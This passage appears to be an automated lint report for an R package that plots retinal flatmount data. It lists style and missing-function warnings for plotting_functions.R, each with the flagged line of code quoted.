format\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:41:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L41) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param z_vector numerical vector of density values for each of the coordinates\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:42:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L42) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param xy_outline_points 2 columns of coordinate(X,Y) data in ImageJ pixel format for the outline coordinates.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:45:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L45) *style:* **Lines should not be more than 80 characters.**\n```r\n​traditional_flatmount_plot <- function(pixel_xy_positions, z_vector, xy_outline_points) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:46:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L46) *style:* **Lines should not be more than 80 characters.**\n```r\n​    fit <- Tps(pixel_xy_positions, z_vector)  # fits a surface to ozone measurements.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:46:12:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L46) *warning:* **no visible global function definition for ‘Tps’, Did you mean 'Ops'?**\n```r\n​    fit <- Tps(pixel_xy_positions, z_vector)  # fits a surface to ozone measurements.\n           ^~~\n```\n[R/plotting_functions.R:47:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L47) *warning:* **no visible global function definition for ‘set.panel’**\n```r\n​    set.panel(2, 2)\n    ^~~~~~~~~\n```\n[R/plotting_functions.R:49:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L49) *warning:* **no visible global function definition for ‘set.panel’**\n```r\n​    set.panel()\n    ^~~~~~~~~\n```\n[R/plotting_functions.R:52:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L52) *warning:* **no visible global function definition for ‘surface’**\n```r\n​    surface(fit)  # Quick image/contour plot of GCV surface.\n    ^~~~~~~\n```\n[R/plotting_functions.R:61:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L61) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' Shows a visualization of the outline, as well as the location of each datapoint so the user can identify where the tears are.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:64:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L64) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param path_to_retina_data_folder The path to the folder that contains the outline.roi file.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:65:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L65) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @return roi_coordinates XY vals of pixel coordinates of the outline points, in order.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:69:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L69) *style:* **Lines should not be more than 80 characters.**\n```r\n​    roi_object <- read.ijroi(file.path(path_to_retina_data_folder, \"outline.roi\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:69:19:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L69) *warning:* **no visible global function definition for ‘read.ijroi’**\n```r\n​    roi_object <- read.ijroi(file.path(path_to_retina_data_folder, \"outline.roi\"))\n                  ^~~~~~~~~~\n```\n[R/plotting_functions.R:70:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L70) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/plotting_functions.R:72:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L72) *style:* **Lines should not be more than 80 characters.**\n```r\n​    # format plots has the coordinate (0, 0) in the top left.  We have the coordinate\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:73:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L73) *style:* **Lines should not be more than 80 characters.**\n```r\n​    # (0, 0) in the bottom left. We need to transform P so that the outline appears\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:76:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L76) *style:* **Variable or function name should be snake_case.**\n```r\n​    roi_XY_coords <- roi_object$coords\n    ^~~~~~~~~~~~~\n```\n[R/plotting_functions.R:80:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L80) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/plotting_functions.R:81:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L81) *style:* **Lines should not be more than 80 characters.**\n```r\n​    plot(roi_XY_coords, type = \"l\", col = \"#d3d3d3\", asp = 1, xlab = \"X Pixels\", \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:81:81:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L81) *style:* **Trailing whitespace is superfluous.**\n```r\n​    plot(roi_XY_coords, type = \"l\", col = \"#d3d3d3\", asp = 1, xlab = \"X Pixels\", \n                                                                                ^\n```\n[R/plotting_functions.R:83:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L83) *style:* **Lines should not be more than 80 characters.**\n```r\n​    text(roi_XY_coords[, 1], roi_XY_coords[, 2], labels = 1:length(roi_XY_coords[, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:83:83:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L83) *style:* **Trailing whitespace is superfluous.**\n```r\n​    text(roi_XY_coords[, 1], roi_XY_coords[, 2], labels = 1:length(roi_XY_coords[, \n                                                                                  ^\n```\n[R/plotting_functions.R:85:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L85) *style:* **Lines should not be more than 80 characters.**\n```r\n​    message(\"If you are getting this message, you are using a special feature. Contact me at brian.cohn@usc.edu and I will happily teach you how to use it.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:93:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L93) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description Creates a markup.csv file. One of the dorsal_outline_index or nasal_outline_index must be filled in. Not both.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:96:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L96) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param dorsal_outline_index The index of the point that points toward dorsal, or NA.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:97:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L97) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param nasal_outline_index The index of the opint that points toward nasal, or NA.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:98:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L98) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param path_to_retina_data_folder The path where the markup.csv file will be saved.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:100:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L100) *style:* **Lines should not be more than 80 characters.**\n```r\n​assemble_markup_file <- function(eye_left_or_right, path_to_retina_data_folder, dorsal_outline_index = NA, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:100:107:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L100) *style:* **Trailing whitespace is superfluous.**\n```r\n​assemble_markup_file <- function(eye_left_or_right, path_to_retina_data_folder, dorsal_outline_index = NA, \n                                                                                                          ^\n```\n[R/plotting_functions.R:103:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L103) *style:* **Lines should not be more than 80 characters.**\n```r\n​        ## https://stackoverflow.com/questions/18509527/first-letter-to-upper-case\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:109:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L109) *style:* **Lines should not be more than 80 characters.**\n```r\n​        line2 <- paste0(\"NA,\", nasal_outline_index, \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:109:57:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L109) *style:* **Commas should always have a space after.**\n```r\n​        line2 <- paste0(\"NA,\", nasal_outline_index, \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                        ^\n```\n[R/plotting_functions.R:109:62:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L109) *style:* **Commas should always have a space after.**\n```r\n​        line2 <- paste0(\"NA,\", nasal_outline_index, \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                             ^\n```\n[R/plotting_functions.R:109:93:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L109) *style:* **Trailing whitespace is superfluous.**\n```r\n​        line2 <- paste0(\"NA,\", nasal_outline_index, \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                                                            ^\n```\n[R/plotting_functions.R:112:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L112) *style:* **Lines should not be more than 80 characters.**\n```r\n​        line2 <- paste0(dorsal_outline_index, \",NA\", \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:112:58:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L112) *style:* **Commas should always have a space after.**\n```r\n​        line2 <- paste0(dorsal_outline_index, \",NA\", \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                         ^\n```\n[R/plotting_functions.R:112:63:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L112) *style:* **Commas should always have a space after.**\n```r\n​        line2 <- paste0(dorsal_outline_index, \",NA\", \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                              ^\n```\n[R/plotting_functions.R:112:94:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​        line2 <- paste0(dorsal_outline_index, \",NA\", \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                                                             ^\n```\n[R/plotting_functions.R:120:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L120) *style:* **Lines should not be more than 80 characters.**\n```r\n​    message(paste(\"Wrote markup file to \", output_path, \"\\n Ensure that it exists beside your outline.roi file\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:130:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L130) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param tear_coordinates_dataframe the dataframe of 3 columns, with c('V0','VB','VF'), and n columns, where n= number of tears\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:131:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L131) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param path_to_retina_data_folder The path where the T.csv file will be saved.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:135:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L135) *style:* **Lines should not be more than 80 characters.**\n```r\n​assemble_tear_file <- function(tear_coordinates_dataframe, path_to_retina_data_folder) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:138:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L138) *style:* **Lines should not be more than 80 characters.**\n```r\n​    write.table(tear_coordinates_dataframe, output_path, sep = \",\", row.names = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:139:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L139) *style:* **Lines should not be more than 80 characters.**\n```r\n​    message(paste(\"Wrote tear file to \", output_path, \"\\n Check that it exists beside your outline.roi file\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:147:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L147) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param path_to_retina_data_folder The path where the P.csv file will be saved.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:151:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L151) *style:* **Lines should not be more than 80 characters.**\n```r\n​assemble_point_coordinates_file <- function(outline_coordinates, path_to_retina_data_folder) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:151:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L151) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​assemble_point_coordinates_file <- function(outline_coordinates, path_to_retina_data_folder) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:155:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L155) *style:* **Lines should not be more than 80 characters.**\n```r\n​    message(paste(\"Wrote coordinates file to \", output_path, \"\\n Check that it exists beside your outline.roi file\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:177:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L177) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​plot_degree_label_for_latitudes <- function(outer_radius, circle.rads) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:177:59:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L177) *style:* **Variable or function name should be snake_case.**\n```r\n​plot_degree_label_for_latitudes <- function(outer_radius, circle.rads) {\n                                                          ^~~~~~~~~~~\n```\n[R/plotting_functions.R:178:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L178) *style:* **Lines should not be more than 80 characters.**\n```r\n​    axis(2, pos = -1.25 * outer_radius, at = sort(union(circle.rads, -circle.rads)), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:178:85:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L178) *style:* **Trailing whitespace is superfluous.**\n```r\n​    axis(2, pos = -1.25 * outer_radius, at = sort(union(circle.rads, -circle.rads)), \n                                                                                    ^\n```\n[R/plotting_functions.R:180:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L180) *style:* **Lines should not be more than 80 characters.**\n```r\n​    text(-1.26 * outer_radius, sort(union(circle.rads, -circle.rads)), sort(union(circle.rads, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:180:95:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L180) *style:* **Trailing whitespace is superfluous.**\n```r\n​    text(-1.26 * outer_radius, sort(union(circle.rads, -circle.rads)), sort(union(circle.rads, \n                                                                                              ^\n```\n[R/plotting_functions.R:195:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L195) *style:* **Lines should not be more than 80 characters.**\n```r\n​    fields::image.plot(legend.only = TRUE, col = col, zlim = zlim, family = \"Palatino\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:202:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L202) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param endpoints a 4 element numeric vector describing the xy and x'y' for the line segment.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:206:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L206) *style:* **Lines should not be more than 80 characters.**\n```r\n​    segments(endpoints[1], endpoints[2], endpoints[3], endpoints[4], col = color_hex)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:216:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L216) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param endpoints vector of 4 numerics, x,y and x',y' defining the line segment\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:217:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L217) *style:* **Lines should not be more than 80 characters.**\n```r\n​write_labels_at_endpoint_locations <- function(r_label, l_label, degree, endpoints) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:217:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L217) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​write_labels_at_endpoint_locations <- function(r_label, l_label, degree, endpoints) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:226:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L226) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description We do not need points plotted in the corners of the plotted circle.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:233:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L233) *style:* **Lines should not be more than 80 characters.**\n```r\n​nullify_vals_outside_the_circle <- function(minitics, spatial_res, heatmap_matrix, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:233:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L233) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​nullify_vals_outside_the_circle <- function(minitics, spatial_res, heatmap_matrix, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:233:83:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L233) *style:* **Trailing whitespace is superfluous.**\n```r\n​nullify_vals_outside_the_circle <- function(minitics, spatial_res, heatmap_matrix, \n                                                                                  ^\n```\n[R/plotting_functions.R:235:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L235) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    matrix_position_is_within_the_circle <- function() {\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:238:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L238) *style:* **Variable or function name should be snake_case.**\n```r\n​    markNA <- matrix(minitics, ncol = spatial_res, nrow = spatial_res)\n    ^~~~~~\n```\n[R/plotting_functions.R:246:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L246) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description Find the location to put the label around the circle at each of the lines\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:251:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L251) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​compute_longitude_label_location <- function(axis.rads, outer_radius) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:251:46:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L251) *style:* **Variable or function name should be snake_case.**\n```r\n​compute_longitude_label_location <- function(axis.rads, outer_radius) {\n                                             ^~~~~~~~~\n```\n[R/plotting_functions.R:252:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L252) *style:* **Lines should not be more than 80 characters.**\n```r\n​    return(c(RMat(axis.rads) %*% matrix(c(1.1, 0, -1.1, 0) * outer_radius, ncol = 2)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:252:14:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L252) *warning:* **no visible global function definition for ‘RMat’, Did you mean 'hat'?**\n```r\n​    return(c(RMat(axis.rads) %*% matrix(c(1.1, 0, -1.1, 0) * outer_radius, ncol = 2)))\n             ^~~~\n```\n[R/plotting_functions.R:261:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L261) *style:* **Lines should not be more than 80 characters.**\n```r\n​    endpoints <- zapsmall(c(RMat(axis_radian) %*% matrix(c(1, 0, -1, 0) * outer_radius, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:261:88:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L261) *style:* **Trailing whitespace is superfluous.**\n```r\n​    endpoints <- zapsmall(c(RMat(axis_radian) %*% matrix(c(1, 0, -1, 0) * outer_radius, \n                                                                                       ^\n```\n[R/plotting_functions.R:263:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L263) *warning:* **no visible global function definition for ‘draw_line_segments’**\n```r\n​    